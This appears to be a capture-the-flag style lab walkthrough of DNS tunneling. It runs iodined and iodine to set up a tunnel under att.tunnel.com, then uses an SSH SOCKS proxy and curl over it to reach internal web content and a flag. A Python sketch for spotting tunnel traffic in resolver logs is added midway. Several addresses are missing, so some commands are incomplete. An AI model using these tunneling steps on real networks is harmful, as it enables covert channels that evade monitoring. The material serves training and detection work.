DNS tunneling

This technique is also known as TCP over DNS: an attacker encapsulates other protocols, such as HTTP requests, inside DNS traffic, building on the DNS data exfiltration technique. DNS tunneling establishes a communication channel over which data is sent and received continuously.

Start the iodined server on the thm attacker host:

thm@attacker$ sudo iodined -f -c -P thmpass att.tunnel.com
Opened dns0
Setting IP of dns0 to
Setting MTU of dns0 to 1130
Opened IPv4 UDP socket
Listening to dns for domain att.tunnel.com

Start iodine client on the jump host:

thm@jump-box:~$ sudo iodine -P thmpass att.tunnel.com
[sudo] password for thm: 
Opened dns0
Opened IPv4 UDP socket
Sending DNS queries for att.tunnel.com to
Autodetecting DNS query type (use -T to override).
Using DNS type NULL queries
Version ok, both using protocol v 0x00000502. You are user #0
Setting IP of dns0 to
Setting MTU of dns0 to 1130
Server tunnel IP is
Testing raw UDP data to the server (skip with -r)
Server is at, trying raw login: OK
Sending raw traffic directly to
Connection setup complete, transmitting data.
Detaching from terminal...
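
From the defender's side, the client output above (NULL-type queries under att.tunnel.com) suggests what to look for in resolver logs: one client sending many long, unique, random-looking subdomains to a single zone. The following is an added detection sketch, not part of the original walkthrough; the log tuple format, thresholds, client addresses and sample names are assumptions constructed for illustration.

```python
import hashlib
import math
from collections import Counter, defaultdict

RARE_QTYPES = {"NULL", "TXT"}  # record types with room for payload, rare from ordinary clients

def entropy(s):
    """Shannon entropy of a string, in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def split_name(qname, zone_labels=2):
    """Return (subdomain, zone). Assumption: the zone is the last two labels;
    production code should consult a public-suffix list instead."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-zone_labels]), ".".join(labels[-zone_labels:])

def score_tunnels(records, min_unique=5, min_avg_len=30, min_entropy=3.5):
    """records: iterable of (client, qname, qtype). Thresholds are illustrative
    assumptions to tune against your own resolver logs."""
    groups = defaultdict(list)
    for client, qname, qtype in records:
        sub, zone = split_name(qname)
        groups[(client, zone)].append((sub, qtype.upper()))
    flagged = {}
    for key, items in groups.items():
        subs = {s for s, _ in items}
        if len(subs) < min_unique:          # a handful of hostnames is normal
            continue
        avg_len = sum(map(len, subs)) / len(subs)
        avg_ent = sum(map(entropy, subs)) / len(subs)
        rare = sum(t in RARE_QTYPES for _, t in items) / len(items)
        # Long, ever-changing subdomains plus random-looking text or rare types
        if avg_len >= min_avg_len and (avg_ent >= min_entropy or rare >= 0.5):
            flagged[key] = {"unique": len(subs), "avg_len": round(avg_len, 1),
                            "avg_entropy": round(avg_ent, 2), "rare_share": round(rare, 2)}
    return flagged

def sample_records():
    """Constructed log lines (not captured from the lab): one client sending
    tunnel-like names under att.tunnel.com, one browsing normally."""
    tunnel = [("192.0.2.10", hashlib.sha256(bytes([i])).hexdigest()[:48] + ".att.tunnel.com", "NULL")
              for i in range(20)]
    benign = [("192.0.2.11", h + ".example.com", "A")
              for h in ("www", "mail", "api", "cdn", "static", "login")]
    return tunnel + benign

if __name__ == "__main__":
    for key, stats in score_tunnels(sample_records()).items():
        print(key, stats)
```

In the session above the client reports switching to raw UDP sent directly to the server, so resolver logs would show only the setup queries; in that case direct UDP traffic to port 53 on a host that is not an approved resolver is the signal to watch at the network edge.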

Open another terminal on the attacker host and SSH to the jump host over the DNS tunnel:

thm@attacker:~$ sudo ssh thm@ -4 -f -N -D 1080
[sudo] password for thm: 
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:Ks0kFNo7GTsv8uM8bW78FwCCXjvouzDDmATnx1NhbIs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
thm@'s password: 

With this connection to the jump host over the dns0 network, we can access resources through the SOCKS proxy:

thm@attacker:~$ curl --socks5
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<address>Apache/2.4.41 (Ubuntu) Server at Port 80</address>

Get the flag:

thm@attacker:~$ curl --socks5